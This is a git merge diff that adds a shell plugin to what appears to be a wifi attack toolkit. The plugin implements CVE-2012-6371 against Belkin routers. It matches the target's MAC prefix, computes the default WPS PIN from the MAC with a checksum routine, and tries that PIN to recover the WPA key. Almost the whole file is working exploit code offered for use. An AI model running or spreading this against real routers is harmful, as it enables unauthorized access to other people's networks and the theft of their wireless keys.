Merge remote-tracking branch 'inspector_wifi/wifi_scanner'

Conflicts:
	.gitignore

1 files changed, 40 insertions, 0 deletions

diff --git a/usr/lib/autowifi/plugins/11belkin_wps b/usr/lib/autowifi/plugins/11belkin_wps
new file mode 100755
index 00000000..d4eb8e37
--- /dev/null
+++ b/usr/lib/autowifi/plugins/11belkin_wps
@@ -0,0 +1,40 @@
+#!/bin/sh
+# thanks to http://ednolo.alumnos.upv.es/?p=1295G
+# for the PoC code 
+# Calculates the default WPS pin of Belkin Routers and returns the WPA key
+#
+# Implementation of CVE-2012-6371
+
+# works :
+# Belkin_N+_XXXXXX   00:22:75:XX:XX:XX    F5D8235-4 v1000
+# belkin.XXX         00:1C:DF:XX:XX:XX    F5D8231-4 v5000
+# belkin.XXX         09:86:3B:XX:XX:XX    F9K1104   v1000
+
+cd $(dirname $(readlink -f $0))
+. ../lib/plugin_core
+. ../lib/wps
+parse_plugin_args "$@"
+
+check_painmode
+
+! check_vendor_mac "$VENDOR_MAC" 002275 001CDF 09863B && echo "VENDOR MAC $VENDOR_MAC not affected" && exit 1
+
+calc_belkin(){
+    PRIVATE_MAC=${1}
+
+    p=$((0x$PRIVATE_MAC % 10000000))
+    wps_pin_checksum(){
+        pin=$1
+        accum=0
+        while [ $pin -ne 0 ];do
+            accum=$((accum + (3 * (pin % 10)) ))
+            pin=$((pin/10))
+            accum=$((accum + pin %10 ))
+            pin=$((pin/10))
+        done
+        echo $(( (10 - accum % 10) % 10))
+    }
+    printf "%07d%d" $p $(wps_pin_checksum $p)
+    return 0
+}
+try_wps_pin $@ $(calc_belkin ${PRIVATE_MAC})